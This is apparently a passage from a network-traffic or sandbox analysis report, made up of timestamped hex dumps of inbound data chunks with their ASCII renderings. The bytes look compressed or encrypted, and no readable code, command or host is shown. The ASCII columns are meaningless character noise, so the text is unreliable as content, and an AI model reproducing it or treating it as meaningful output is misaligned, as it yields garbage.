                                                                                                                                                                          2022-12-05 14:13:35 UTC83INData Raw: 1e 90 de 9a 74 df d5 a2 d1 bb 76 20 a0 ad 4c 07 89 e7 80 82 af 4c 02 ec 3a 4d 83 65 da 0c 48 52 ff 00 00 8f 03 f4 9c 27 84 ff d0 39 92 8f 20 82 e1 39 cd 70 d5 ea 6c 55 23 ce 8f 4e f9 06 6b 49 e1 27 8a 6b b6 71 2d e7 0b 3b 12 53 c2 cb 0b a8 76 f1 6b e0 9a 47 1f b9 c4 b2 a7 27 bf 7a 6a c7 9f 6c a6 17 9b c1 4d b2 04 ef bd c9 01 31 dd ac 43 a3 bc 5c eb 99 89 ac 2d 16 7d ce 21 41 c5 cc 04 2f a0 da db 58 40 35 62 1d fd b0 bd 11 89 d2 3c e0 3c 55 a7 02 17 b0 41 13 e6 54 19 71 7f e7 44 2f 07 0e f0 58 65 02 92 c9 19 12 a1 d9 1d 36 77 c4 c2 d0 00 af 52 80 a6 ee 0c ff e0 20 37 ff 76 10 a0 61 32 f5 c2 c4 31 6e 8a 90 14 92 a6 98 54 bf 4c ee c6 22 2f 46 53 21 4c 2a c5 62 69 71 12 5d cb f0 63 f1 bf 76 4c c0 16 50 98 e8 db 32 42 39 b2 85 62 69 73 2f 93 83 ca 1d 9a f6 e1
                                                                                                                                                                          Data Ascii: tv LL:MeHR'9 9plU#NkI'kq-;SvkG'zjlM1C\-}!A/X@5b<<UATqD/Xe6wR 7va21nTL"/FS!L*biq]cvLP2B9bis/
                                                                                                                                                                          2022-12-05 14:13:35 UTC84INData Raw: 2c 8c bf 62 64 c0 76 24 6d 57 43 cb 92 47 d9 5c 1d 84 04 5b 90 ba 3d ac 4d 15 a8 9b 5e de 2f 93 5b 39 4e dc 7f d2 0c c1 d8 cb f5 1f fb 31 ee ca 7c 88 bb 19 be b8 cd 15 01 cd e5 c5 1a 5a 6c ca 4e a6 6a 27 70 03 b7 a2 ee 26 0c 53 9e d7 d0 f3 ce b0 9d 3a 72 00 ff 9c 67 4f 01 4f 1e 9a 42 e2 19 03 a2 5c 1d 5f e0 4c 93 0c cf 8b 0b 86 41 e7 b9 5e c0 68 77 13 f1 99 8c f3 47 30 1f ef 60 ee 0b 62 88 d1 27 f7 66 5f ba 73 24 73 64 a4 17 72 3e 91 46 88 1f c5 b8 83 bb f6 34 98 32 1f 8f 0d e5 6e 12 d3 cf d7 d6 da ed c6 63 97 64 6b 8d ae e9 4d 20 5a 6e bc fc 15 7d 49 3c 47 3f 33 2e de 5e a0 04 42 98 9f de 1c bf 71 38 c5 dd a7 07 30 1c 72 64 f2 60 ae 95 0c a6 77 0d 35 c2 dd 23 d3 cd e2 ae d7 fb 05 68 13 11 41 fd 89 cf 03 90 a3 41 6d 74 a2 36 20 cf 91 6f cf fb 90 74 f0 d4
                                                                                                                                                                          Data Ascii: ,bdv$mWCG\[=M^/[9N1|ZlNj'p&S:rgOOB\_LA^hwG0`b'f_s$sdr>F42ncdkM Zn}I<G?3.^Bq80rd`w5#hAAmt6 ot
                                                                                                                                                                          2022-12-05 14:13:35 UTC85INData Raw: b9 9b 39 8a 64 ea 1c 9f 23 0e ca 3c de a3 8b 75 15 cd 45 1e c8 f9 10 a3 91 28 34 7a af 39 ca a0 56 7e 64 1e 71 5c 94 aa d7 ad 6e 20 af 9b 73 04 c2 e4 84 cf 32 8f c4 92 5a 0c c3 a3 8f 84 f5 60 9c 55 82 27 9a df 0d 85 25 7c 9d db 5a f1 cf a7 5f 83 85 18 e6 4e 14 9c 1b ec 27 c2 58 c7 1a 8f 84 ab cf 95 9f 54 c3 72 98 3a 71 fc 16 2a 81 2f 9d 18 a0 e8 07 7d 3c e2 02 4c 17 3f 64 e4 de 7e 99 bd 0a 20 ad 3d 49 6b 04 02 0c ff 88 c0 0d 2e 13 b3 5d 38 b6 5f 04 c0 c1 2a a3 1e 37 17 b3 8c 35 b2 a7 fc 60 9a 8f e8 c4 45 8f 28 91 07 b0 36 b0 08 44 41 3a 96 fc a6 a5 48 0c b7 cd f3 5a 92 18 6c a1 a0 e0 17 ff bf 46 2d 5e b6 61 d4 cf e1 95 87 31 4f b3 10 f3 af ec 72 6f 9c 8b e7 38 c2 f7 e7 f1 c9 a6 b5 6e 18 4e f8 d9 d4 d9 f8 2a 8d e1 45 c5 a8 a2 8e bc 7d 3f d3 00 1a 9f e8 08
                                                                                                                                                                          Data Ascii: 9d#<uE(4z9V~dq\n s2Z`U'%|Z_N'XTr:q*/}<L?d~ =Ik.]8_*75`E(6DA:HZlF-^a1Oro8nN*E}?
                                                                                                                                                                          2022-12-05 14:13:35 UTC87INData Raw: 67 d4 64 b5 82 20 5a 25 4b 76 7a 7d 9d f7 15 92 2d a0 0a 57 54 65 b3 dd 32 80 3c f5 2e b2 38 9d 2d 24 94 30 48 fe 3e 3d 45 6b 40 ef 11 ef 9d fe 9c bf 90 87 5f 4b 80 03 98 f2 88 dd 9c 7e 43 89 0a 6a a0 bf d3 ab e4 5a 70 1d a7 87 a1 c3 75 a6 a8 58 66 c3 4a 65 96 cf 75 cd 14 47 f9 b5 6b 76 1a 13 16 63 e1 fb 11 fe 59 ed b4 cd 2a d4 21 24 2e d9 c9 19 f1 6f bc 61 2e 61 20 a8 8a bf a4 d8 e6 59 ca cc 63 66 46 1b 5b ac e1 bc fa ad 7c fc c8 83 a9 9b 59 31 2a 9b 39 24 35 12 86 df 5d b1 96 51 de 22 75 a8 69 e6 c5 58 c1 93 02 79 4e a3 d4 0d d9 d7 77 64 ed 60 c4 7d 21 ad de f0 89 58 08 37 20 9a 0c a6 df 02 e4 fc 3a 9d ca 56 1d 1b 0f 8c 96 78 da 06 d5 7c 72 d4 8e 21 52 c9 dc 8e 0d 7f 12 89 c6 3a 83 46 20 f3 b4 3a 08 74 91 30 55 25 d1 24 10 be 62 83 59 85 8c 1d 0a 33 b5
                                                                                                                                                                          Data Ascii: gd Z%Kvz}-WTe2<.8-$0H>=Ek@_K~CjZpuXfJeuGkvcY*!$.oa.a YcfF[|Y1*9$5]Q"uiXyNwd`}!X7 :Vx|r!R:F :t0U%$bY3
                                                                                                                                                                          2022-12-05 14:13:35 UTC88INData Raw: 52 5b 5b c6 05 f2 0d 2a fe ff 73 cd 71 eb 48 c5 07 e5 8b d3 04 e0 93 c4 20 c1 36 09 9f fa f3 64 ec 4b 1d 6f 9d 44 4f 63 4a c8 df 27 fd 2d db 79 e0 04 d2 60 5b 3a ad 8f 53 c7 0b 2e 76 b8 a9 ca 64 c1 c6 63 a1 2a 2e 68 05 35 a6 c0 20 ee e7 ca 8e 1e 4e dd ca ac fd 02 82 23 16 c0 56 b0 ae ab e1 b0 47 9c f7 3a 12 f1 53 ec 37 68 df 4e 6b d4 a5 39 f5 59 8b 84 ec be a0 fe f5 7e e3 9f ad a1 b7 23 ba 8a e7 d8 68 b4 5b 9c 5c e7 dc 1c 01 97 69 55 24 44 1c e7 5b 24 20 a0 49 db 05 8a cd 93 4c 5f 3d fe 31 fa 9d 32 f9 b7 66 c0 b9 79 1f 78 04 69 97 40 ed 7a ea 5f ee 77 6f cc 38 b9 17 33 c7 38 bd 86 86 0a 58 af 6f f4 8f ad 26 8e 3e be d7 1c 10 64 b6 bf 1e 0f cc d3 9f b3 bb ec ff 0c fe ff 52 e1 a9 45 2e 33 25 45 0f fc 2a b2 a4 8c 67 60 47 27 c0 b6 88 1b 66 6b 2b 8b 9c 55 5e
                                                                                                                                                                          Data Ascii: R[[*sqH 6dKoDOcJ'-y`[:S.vdc*.h5 N#VG:S7hNk9Y~#h[\iU$D[$ IL_=12fyxi@z_wo838Xo&>dRE.3%E*g`G'fk+U^
                                                                                                                                                                          2022-12-05 14:13:35 UTC89INData Raw: a3 76 25 c8 98 db 92 4b 8f 43 eb 78 d1 e8 6a 35 a0 6c ac 2b 99 bb 07 ca 49 7a 25 8f fa e2 77 27 82 b7 11 e7 e0 9d 05 54 b3 d8 57 49 01 f0 70 25 86 d9 b7 6d 2b 63 9f 1f 3a c5 c7 bd fa 7c 00 6c 1f d7 9e 79 33 a1 6b fa 77 cc 59 f4 6f 8a e2 3f 69 f9 71 2d 4c 13 6b 42 1a 90 21 8f 26 6e 89 c4 8c 9e 8f 61 09 8f 9b 78 69 f5 85 b2 a8 28 0e a0 1b 2b a5 6f c3 06 9e a3 9b ed e7 7f ba 22 03 7b aa 3a 15 13 e3 56 ee de ad 3c 9f 14 18 c9 64 b3 ed c6 eb 6f 15 89 96 61 75 b0 fc 58 96 81 29 ae ee b0 a9 5e ef 36 3f b3 4c 19 81 4b b6 07 3f 22 f0 9b 86 b0 36 fa bc 53 14 b8 01 0d 1c aa 85 21 a1 f0 de 69 ed 6a 4a d6 94 84 01 d4 99 3f de 8c 12 5c 30 65 d3 fb 8e 1a b5 d2 d0 5a 62 1d 9b 2d 0e 10 4e 83 a0 de 58 ba 5b 14 b9 56 d7 be cd cd 90 ce fd 64 ab 68 8f b2 6d 3e 9d 6b 64 48 47
                                                                                                                                                                          Data Ascii: v%KCxj5l+Iz%w'TWIp%m+c:|ly3kwYo?iq-LkB!&naxi(+o"{:V<doauX)^6?LK?"6S!ijJ?\0eZb-NX[Vdhm>kdHG
                                                                                                                                                                          2022-12-05 14:13:35 UTC90INData Raw: 51 98 ab 3e c6 05 89 c9 a1 5b a1 77 c7 e2 bd 08 ef 98 21 d4 d9 a8 d8 76 2a 07 5a 7a 8f f3 69 f8 33 67 df 3b 10 d8 9b 7c 84 93 d4 0d 2d ab b4 ec af 43 6c 44 27 47 63 27 f4 80 0a 28 ab 5f 1c eb ac e1 58 8f 26 40 09 29 8f 61 d9 6b b5 8a 4a 7e 9b 10 d8 a0 ef cf 13 ff 77 8e 5c 06 ee 35 5e 1e 6e 20 08 ab 6a 91 60 c7 1d a2 6d 6a 97 82 51 ed 68 94 f3 fa 5f f3 5e 92 d6 41 9f 7d 97 7a e3 e4 51 8e 4d 8c 01 50 b9 90 16 0b ed 20 70 dc 2e 07 33 da 5c 8e 06 69 f3 b2 05 7a e9 1b 4c 04 95 b0 4b ed b0 3b a8 38 b7 fa e1 25 2b b0 56 4f f8 db 8d f0 79 8f 8b 19 f2 eb 99 be df 8b b6 ae ab f6 b8 0d b7 a7 95 0f e1 18 b7 df 65 fc 9d ba a0 56 4d 60 d7 1c e6 5b 35 6c 23 91 a3 cb 84 15 54 44 79 68 e4 c2 4e 1c 83 d1 30 c6 ad 50 a5 53 eb af cd fe 53 c8 30 fc 0d 6e 9d 8e 24 01 4a c3 cd
                                                                                                                                                                          Data Ascii: Q>[w!v*Zzi3g;|-ClD'Gc'(_X&@)akJ~w\5^n j`mjQh_^A}zQMP p.3\izLK;8%+VOyeVM`[5l#TDyhN0PSS0n$J
                                                                                                                                                                          2022-12-05 14:13:35 UTC91INData Raw: ee 89 28 9b 55 25 e9 6a 25 af 34 a0 7d 36 49 1f b0 85 8c ca 47 c9 b5 11 de 37 2b 55 f8 db 83 1b 7e 9f f0 52 be 30 dc d5 67 ac 6c 70 f3 0c e0 01 af a3 0a 84 f4 10 62 61 58 01 24 14 70 03 29 05 97 5b 6a 81 4e 30 f7 a3 4e 51 db f2 3c 07 30 6b f9 1d 9d 6e b4 26 72 d2 e2 be bf f6 0b da 87 51 88 c3 22 5b 20 5f d7 b1 06 1f 12 b5 31 bb dd cb ad 7d e6 ae 95 87 82 b3 90 45 de 9f 71 82 09 55 85 58 15 0e 2e 31 a2 cc 33 e4 0c cc 8c 48 69 16 be 7a 10 37 ab 7c 89 9e aa 7f 89 5d 48 b8 54 47 73 ce ed 85 4c 23 b9 9b 4d 65 93 14 9f 6f 1c 1b 9e a1 de 58 1f e8 45 d9 08 cd b5 9b bf 12 05 ef bb 90 09 ea f0 76 03 f1 38 d6 a7 54 0f 9e ff 95 c1 4b 05 20 80 60 44 9e 6d f6 1a 07 f4 52 9e da 84 83 53 e2 0d 23 a1 42 c6 e2 0f 69 9d 6d 76 40 bd 52 a5 ae 49 71 2c 4d 59 37 54 75 24 a8 07
                                                                                                                                                                          Data Ascii: (U%j%4}6IG7+U~R0glpbaX$p)[jN0NQ<0kn&rQ"[ _1}EqUX.13Hiz7|]HTGsL#MeoXEv8TK `DmRS#Bimv@RIq,MY7Tu$
                                                                                                                                                                          2022-12-05 14:13:35 UTC93INData Raw: 82 68 b5 32 8c 25 ab f5 40 91 08 66 30 a3 cc 13 e2 0c 5e 20 8e d1 53 07 92 73 8d 18 cf c5 a2 c2 97 16 cc ca 4f 47 3a 2d f2 df 07 3d dc 8b bd 3a d7 12 7c 17 b7 31 39 5d 93 2d d9 2a 8a c7 46 f1 3b 92 aa f6 26 8c 21 88 59 bc eb 34 1d 56 bc 30 65 0e cd 96 ca c3 aa 97 8d 2b 61 d7 d2 96 e6 c6 06 ed 9f e4 63 23 b2 9e c5 df 4e b6 be ac 8d c4 c7 9b aa 8a ce 42 c2 cb 78 af 7e ab 77 e8 49 5e c3 7f 96 27 1d 81 d2 3f 11 0f 62 f1 a3 3b 68 b9 3a 3a b8 23 d4 2a ce e8 49 3a 87 9e bf 3f 5a 28 82 d3 5a 37 8c c8 bf 81 e6 5b 03 e1 f1 7b 5f 7c e1 2f 3c e8 ae 27 6c 7f 59 05 90 a8 b7 4b 85 77 68 39 a2 b9 07 53 da 15 ee f9 2c 58 49 ed af 0e 75 15 e6 4d fb cc 97 cf bb 3a 38 08 9a 7e 34 7c c0 16 6a 21 ac 08 d3 04 fd 93 86 4a 68 81 3b 35 3c 8d 75 52 b1 0c f2 44 ec e5 ce d0 47 28 48
                                                                                                                                                                          Data Ascii: h2%@f0^ SsOG:-=:|19]-*F;&!Y4V0e+ac#NBx~wI^'?b;h::#*I:?Z(Z7[{_|/<'lYKwh9S,XIuM:8~4|j!Jh;5<uRDG(H
                                                                                                                                                                          2022-12-05 14:13:35 UTC94INData Raw: 27 4e e0 df 28 e1 92 c1 20 79 18 06 a7 a3 94 75 37 18 d8 04 46 cc 18 6a 11 9e ac 96 ef 83 bf bd 7b 5a 3f b1 0b 7c d4 72 31 89 99 c2 59 41 98 79 15 9d 52 58 b1 c9 1d 71 45 23 ac 8e 8a 72 be f5 36 5f d7 67 d5 f2 fb be 07 84 33 73 01 55 6f 04 fa 94 12 6e d9 f6 3c 4e 73 84 c4 0e 21 8e 55 c7 63 0d b1 71 21 86 27 42 df 71 aa 2d 30 4a d0 b8 de 8c 11 bc be f1 3c 9b 1a ce 31 71 a2 eb 63 6f c9 d3 d6 11 d8 3e e0 4c d0 b3 55 92 de 3a a2 28 29 ab 39 c3 e7 bb 0b 95 33 51 7e 67 19 ad 2b 78 31 07 60 d4 c8 bf b8 95 4b a6 cc 02 cb 51 92 6b 99 ac a6 5d 8f af 30 aa 99 86 36 9a 07 5d 36 5c 36 80 94 16 bf ff 64 7b b7 ce ca 97 2e 6d 23 eb 20 2f f5 e6 3d 76 42 ab ed 54 72 2d c7 18 67 33 f0 0b fd d7 43 9c a3 b0 6b b7 5e 70 aa d0 cb 36 3f 57 d7 99 5f f4 ca e7 1f 68 d0 9a 63 91 10
                                                                                                                                                                          Data Ascii: 'N( yu7Fj{Z?|r1YAyRXqE#r6_g3sUon<Ns!Ucq!'Bq-0J<1qco>LU:()93Q~g+x1`KQk]06]6\6d{.m# /=vBTr-g3Ck^p6?W_hc
                                                                                                                                                                          2022-12-05 14:13:35 UTC95INData Raw: eb 14 3f cf bb 14 de 38 00 2b bb 94 a1 29 d9 ad 13 cb a6 04 e2 30 93 31 6b 2c f1 99 1d f7 21 00 08 54 35 26 cc 09 9b 7a 40 87 0a 11 28 ef f5 07 52 75 34 1b 44 79 37 ab 04 f8 db fc bd 3a 81 4a 1c d5 b9 44 fe a0 30 1f 0d 9e 21 54 00 1d 96 2b 64 15 ea bd f4 c5 90 9d 79 d1 05 de 0c 30 3d a1 b8 a2 3f 9f 2e df 31 13 72 64 21 2d ef 7e 21 ff 23 c4 81 ce 61 91 e4 2c f1 08 24 70 29 a6 5e 24 26 17 10 d4 3c f0 49 f0 76 fc a1 ff 28 c2 05 10 38 2f 0e c4 6a a2 53 31 0e 76 06 ca c8 28 cb c8 b2 48 33 88 85 c5 5e a8 40 db f9 80 30 f9 69 70 45 9f dd 07 bf 54 67 89 d5 01 0e b2 cf 98 f4 5d eb 3f 62 83 07 93 00 07 26 7e a3 b9 f9 c6 e1 e8 77 6d e9 3e 56 19 d0 8c ed 5f e9 28 ed ac e7 9e a3 87 37 ac 2f 73 73 01 48 b0 48 14 57 47 73 92 df 7d 9f 88 d7 62 60 cb a8 54 1a ee 64 66 8d
                                                                                                                                                                          Data Ascii: ?8+)01k,!T5&z@(Ru4Dy7:JD0!T+dy0=?.1rd!-~!#a,$p)^$&<Iv(8/jS1v(H3^@0ipETg]?b&~wm>V_(7/ssHHWGs}b`Tdf
                                                                                                                                                                          2022-12-05 14:13:35 UTC96INData Raw: e1 31 9b 0e 0a 71 11 20 8a 9c 11 89 8b 2f 66 da 55 5d 8f 8f 64 08 aa 8d f3 40 29 71 7c fa 3e 95 00 46 cc ac fd de 69 ef 75 31 33 55 ff a7 ab 8e e2 65 60 5c 4b 18 b1 8f d3 bc 6e df 4f 07 de 89 2f 84 97 bf cd 4b 13 f2 87 32 d5 c3 d5 7b 44 fd 97 9a ba 6f 54 29 7e 55 89 ff 6c c4 2a 5b 38 03 df fc 85 70 53 c6 30 99 4c ed 61 c6 20 a8 f9 5d 63 e2 a7 83 2d 24 8a 2c 34 f5 61 0f e2 f9 e3 86 ca a5 bf 02 30 5b 64 60 a0 9c fc 03 65 9b fa 7c 56 e1 a7 00 e4 9b e3 f1 c0 0b ce d3 64 e6 79 1b ae 0b 98 6a 22 36 24 df bc 27 19 dd b7 68 6a 3f 44 f8 52 a9 89 82 05 aa 5c da 45 68 88 bd f1 05 76 3b 81 b1 fd a7 c3 90 f9 71 dd dd e2 79 49 89 e5 a0 5b 97 a3 78 54 13 da 4b 31 e7 fd 43 d8 37 3c f3 e0 ea 24 6f e0 52 88 07 26 bd 35 4c de 21 63 d1 a7 f2 ad 16 5c 37 98 b9 85 26 7d 65 b8
                                                                                                                                                                          Data Ascii: 1q /fU]d@)q|>Fiu13Ue`\KnO/K2{DoT)~Ul*[8pS0La ]c-$,4a0[d`e|Vdyj"6$'hj?DR\Ehv;qyI[xTK1C7<$oR&5L!c\7&}e
                                                                                                                                                                          2022-12-05 14:13:35 UTC98INData Raw: 07 98 f9 c5 0f cb 9a 4e 79 a4 6e d2 8d 20 b0 ab d1 7a 92 ea 5e 0f d0 46 66 84 44 7e 07 a0 8b a2 97 28 97 23 e8 e2 b7 23 db 19 63 c8 46 31 8c cc fa 55 ae 8a 4c 55 fa 12 f9 c4 c1 3f 6f 84 18 3f 6b 5c 4e 8c 89 80 34 38 3e c9 1f 90 e8 db 7f aa 59 62 9a b1 14 30 8d 61 f5 8a df 95 e9 b9 c2 ba e1 6b fd 07 ff f1 22 7b 04 b5 a7 9c
                                                                                                                                                                          Data Ascii: Nyn z^FfD~(##cF1ULU?o?k\N48>Yb0ak"{
                                                                                                                                                                          2022-12-05 14:13:35 UTC98INData Raw: 87 e8 77 88 02 db ac 92 f0 0b d1 46 97 53 2a ff 7a e6 a4 80 38 b7 6a f9 a2 8f 3b c2 9e 82 1d cb e8 da b0 23 3a 6c 00 c5 ae 8d b1 f5 59 7a 8b f0 b7 8b 7a a6 b2 93 83 88 cb 7f f5 0e bd d1 d6 c7 9b d0 80 60 bd ac fc 9a f7 79 0e 1e 3e a5 bb 53 8a 2d 27 4f 9a 9d 72 0f 06 64 04 fc 48 e3 65 93 cc df 14 a5 5b 85 64 88 86 d8 17 d8 d9 c0 c1 73 5f dc 36 11 5a 1b 93 21 e4 db 15 3c a7 57 71 7d ad 05 79 cb a5 af ba e4 9a 31 ab b1 4a 41 a5 a4 a3 df 82 71 13 91 10 88 44 a1 7f 94 77 27 c9 f7 ed 20 d6 eb fd 2f e4 f0 75 6d 81 1b ab 71 e3 bc df 7e 90 7a 75 a9 62 f0 e3 4d 0d 74 25 e1 1e 0e 81 e2 1d 3a ff fa 3b c8 0b 81 c2 1d ad 9b 22 25 8d ef 06 aa 91 42 73 b3 43 ec 03 b4 f6 4d 3f 29 5c 12 c1 37 a0 1e 3b 3c 1b c2 de ae 97 d7 f8 a8 4e 31 1a 89 8e 4e a1 6b 86 61 90 03 7f a5 0c
                                                                                                                                                                          Data Ascii: wFS*z8j;#:lYzz`y>S-'OrdHe[ds_6Z!<Wq}y1JAqDw' /umq~zubMt%:;"%BsCM?)\7;<N1Nka
                                                                                                                                                                          2022-12-05 14:13:35 UTC99INData Raw: d0 87 fd 7c 84 23 d7 d1 40 59 0b 94 42 d9 22 e4 b0 2f a8 45 0e ec fe 09 18 60 b2 7a cd 7c d2 77 1a 86 f4 d9 ed fe 35 46 db 4a 3b 79 ed 42 d5 e5 d5 97 93 4f a0 28 b7 d5 57 75 ac 7e f4 07 24 02 87 16 12 43 7c 9e a0 19 ba d6 00 c0 fc 8d a7 ae 9a c6 ed 3d e9 00 1d fa da c2 48 cc 7e 3b 65 1b 4d 5f 60 80 af b6 cd 5a 8a 6f bc e3 d6 bc d3 d8 18 a1 84 79 93 9a 62 d8 3e 1b 27 cf 70 12 91 df 0c 49 bb 59 4b 95 db 90 53 14 2a e8 f8 4b 1a 6a 13 89 9c 73 a3 6a 89 da 25 5e c0 fb cd 1b 8c 36 3b dd 0f f1 2a f3 94 84 d8 ef 48 1c 7b b3 2c 62 81 5d d8 19 2c 4f 3a 8f a5 b8 1c 3a 27 a8 53 cc b1 c5 70 6c 51 9a 80 3e 41 c2 bc 5d ea 3a 77 57 31 c1 3f 67 36 04 d3 4a d8 92 cf 22 6f 4b 98 f3 03 95 d1 fc 8e c5 5f 81 7a 60 de 42 a3 9c 53 5f 6d 23 ec 74 df 33 7e da cd bc 8c 04 3c 36 5a
                                                                                                                                                                          Data Ascii: |#@YB"/E`z|w5FJ;yBO(Wu~$C|=H~;eM_`Zoyb>'pIYKS*Kjsj%^6;*H{,b],O::'SplQ>A]:wW1?g6J"oK_z`BS_m#t3~<6Z
                                                                                                                                                                          2022-12-05 14:13:35 UTC100INData Raw: 77 b8 ac 2c 4a 8c a8 e4 0b 33 fd e8 8d 05 6f a4 b7 e7 f9 37 7d 1e 77 12 14 89 f8 35 20 30 14 a1 9e 78 38 e0 aa 45 ac f2 26 49 6d 2a 87 bf 62 3f f6 f7 e2 4f 43 2b 04 39 bf 52 6a f4 ae c2 23 78 62 b7 cc 54 ab 06 3a 0c 38 66 27 7d 8c 15 a2 8f 19 3a f0 db 8a 1c 2f 5a f6 6f 51 87 0e b9 29 74 38 c0 90 cf da 1b 9f e5 e5 1d 44 09 07 75 95 34 47 8f 12 87 f2 a3 81 2c 64 95 36 7f f3 a9 ee 72 8d c7 74 b5 28 e3 03 42 94 d9 3f 69 4b 1c a2 92 78 1e 96 c4 b3 ce ab 5a 06 74 d8 45 82 24 90 df ae af f8 46 90 da 06 07 93 5a 76 6c 13 92 bf 8b aa ba 2c 90 50 14 53 1e 82 ec 25 3b 82 fd 48 4c 2d 1f ad be 86 1d 69 00 fa dd 6a c7 0f 7a 20 6c ec dd a8 ce fa dc 9c d8 1d 67 a5 33 d9 0d c4 32 f2 c4 cf 95 f4 c6 99 0d 0d 0d 19 2c 3b 79 cb 4f c9 fd 3a 29 2c ce 1c e7 79 81 21 3a fe 5a f0
                                                                                                                                                                          Data Ascii: w,J3o7}w5 0x8E&Im*b?OC+9Rj#xbT:8f'}:/ZoQ)t8Du4G,d6rt(B?iKxZtE$FZvl,PS%;HL-ijz lg32,;yO:),y!:Z
                                                                                                                                                                          2022-12-05 14:13:35 UTC101INData Raw: a6 05 0d 8f 74 5d 9e 9c 94 6e ea 5b 4c 0f 4e e2 98 c8 2d 32 7d f3 59 cb 7c ff 3e 00 52 01 8f 3c 57 12 05 96 84 55 7c fe 14 8b a9 9c 80 b3 c5 bc 52 51 87 e8 7c b4 ad a4 ce 8d 76 4e ff fd b2 a5 df ef 46 1f 92 ea 19 9d d8 e0 cd 10 14 c8 2a 39 e3 79 f5 42 51 00 f1 ee cf a5 76 3d 4a 1d c0 32 61 b2 46 a6 50 ce b5 b7 ae d6 d3 ee e1 41 54 11 41 5f 3c bb 6b 5e df c9 f2 b5 11 46 c9 ec f8 60 9f 69 71 80 30 25 eb c8 ac 33 2d b9 6e 95 bc 55 ba ae c2 f4 60 c1 2d 7a 7a 79 fa af 8e e5 5b 36 81 a9 af 91 e8 c9 0f 6e 3b 83 60 2f b6 0b 83 89 53 ee 20 a6 88 26 e7 a5 fc f5 21 2d 11 da d0 f6 41 3e 93 2c ec 8f d7 e3 aa e5 a3 64 7d 48 32 a9 2b 31 65 3d 6a 08 66 7a f6 5b 02 ac 48 fe 60 71 de 5c 65 51 97 17 a6 80 26 fb 92 70 e4 90 5f f2 fd bd 55 ff b5 56 73 aa cc 81 dd 72 e9 9f 6d
                                                                                                                                                                          Data Ascii: t]n[LN-2}Y|>R<WU|RQ|vNF*9yBQv=J2aFPATA_<k^F`iq0%3-nU`-zzy[6n;`/S &!-A>,d}H2+1e=jfz[H`q\eQ&p_UVsrm
                                                                                                                                                                          2022-12-05 14:13:35 UTC103INData Raw: ad 38 60 b4 00 44 25 bd a7 9c b8 08 b1 8e bb 35 85 e7 d6 d9 ae 38 9e cc e7 cd 23 52 0c 60 9a da b1 fa fb 82 9b 3a e0 16 57 a8 fe 62 0f 2a da 50 e7 b4 c6 8a bb fb 7f 86 82 33 ee 89 04 31 db 19 8c d0 40 3b bc e0 ad 61 3a a4 8a 89 f1 d7 af 65 94 e1 22 ea 2d 5a f0 ff 28 36 e4 25 0f 19 10 d7 fc 81 a0 c8 13 c4 73 45 68 c3 2a 5e 6e 90 05 28 6c 3b 09 df 39 79 b8 58 55 65 16 62 53 1d 38 fc c4 86 2a 8d 78 0b 13 e3 59 b2 a7 65 ac a1 96 70 64 96 c9 d3 17 8e 03 69 1c 0d e0 03 5c 87 c1 c9 a7 e1 dd 9b e6 bf 0b e4 5c 51 6c 00 b6 08 d7 14 52 ac ce c4 93 f2 4d 3a dd b8 af a6 1d 5e e6 7b 1e 8a a0 63 54 98 0e f8 82 0c c3 05 bf 5e 33 dd 13 3d a2 19 f2 6f ad c8 a7 95 9e e0 b4 28 8f e7 7e 3c 10 f2 f2 89 d9 ff 3d 54 ce 33 ef 8d c4 fc 91 3f cd fb a6 66 dd 0d b4 ec 82 f8 82 c0 b9
                                                                                                                                                                          Data Ascii: 8`D%58#R`:Wb*P31@;a:e"-Z(6%sEh*^n(l;9yXUebS8*xYepdi\\QlRM:^{cT^3=o(~<=T3?f
                                                                                                                                                                          2022-12-05 14:13:35 UTC104INData Raw: 30 8a c4 bd 76 a1 56 8e 45 e0 52 31 4d b6 9e d1 b2 96 4a 7e aa 64 9c 84 d4 33 57 70 13 31 19 28 07 f8 b0 38 f3 cd b7 1c c0 eb 50 51 48 62 f3 d1 90 af 6d 4e 0a 6f e7 c1 c0 c7 b3 e9 c8 4b 84 35 cd df 88 55 d9 53 25 ab 02 c5 fc 17 cb ba e6 15 8f f9 a8 36 38 f7 d4 05 c0 07 7e 6b 87 9c 62 e9 5e 16 e1 96 68 82 5a 34 75 3e 21 89 06 bf 56 7e 10 34 35 69 0f ea 47 51 be ab 4e e8 f5 22 c0 ba 62 f2 e1 3c 70 84 92 21 38 2f 35 c3 3d e2 1c 0a 04 5d 74 3e 4c 4d 33 33 93 18 88 2f a9 e2 8b 8a 08 04 c1 41 e4 55 06 45 ae 12 c2 ce 85 91 49 31 c5 22 ba 03 21 70 b1 15 96 c2 fa c0 36 af 6d 3e 1e 69 a3 59 a2 7b 5c da 14 4e 1c 56 2e 74 b9 8f c2 07 c9 51 5c 2e 00 66 8e bc a6 26 d1 c1 0c 76 1d eb 89 db de 60 93 0c a9 c4 a0 46 d4 da 1a 3f 5a 68 80 9e 27 d8 d7 80 36 0f 5b 10 a3 03 4f
                                                                                                                                                                          Data Ascii: 0vVER1MJ~d3Wp1(8PQHbmNoK5US%68~kb^hZ4u>!V~45iGQN"b<p!8/5=]t>LM33/AUEI1"!p6m>iY{\NV.tQ\.f&v`F?Zh'6[O
                                                                                                                                                                          2022-12-05 14:13:35 UTC105INData Raw: a5 eb 71 17 42 39 85 be 7f 8d 82 fc c0 50 a4 3d ed 4e 9e ba 71 12 16 f5 fd b0 d1 f8 7e b4 ab 8c a6 3a 33 09 48 df b5 fb b9 bb b0 9c 25 cf 21 f8 1e 5c 5d 41 87 a5 5a 9c fe 43 65 2c 0c 4d 5b 45 fd 0a 86 7a 7f 43 be 6c ae 44 74 c7 68 2b 32 08 dc d5 b7 50 d0 a0 8f 91 be 88 f7 82 c2 76 96 24 b9 50 b0 90 87 f0 7e db f1 72 6e d1 9d bc 32 e5 3a d8 4f ca b8 4e 5a f8 fd 6d fc 1e f3 ec 77 31 6f b3 b5 f4 06 fe f5 2e bf 4f 8b 0d ec 4c a4 42 c5 1d d9 72 30 38 d2 1a bc 03 b7 97 b5 70 3c 6e a9 da f8 d6 15 15 8a 7e 38 95 ce c2 03 3a fe 42 cd 8a b7 d1 8c 14 bd ee c6 08 23 1e 16 7a b0 0a be 5f 5f 62 73 93 d7 0e 15 f1 1b 89 c0 6e f2 15 00 2d 6a cc cc 98 74 c9 80 7e bc b0 56 8c 7c 93 8b b5 2e f4 9f 00 7f 2e 55 05 c5 f1 5b b8 93 c8 63 97 1c 6c 13 8d b6 7b d5 8b d0 98 0f 43 d7
                                                                                                                                                                          Data Ascii: qB9P=Nq~:3H%!\]AZCe,M[EzClDth+2Pv$P~rn2:ONZmw1o.OLBr08p<n~8:B#z__bsn-jt~V|..U[cl{C
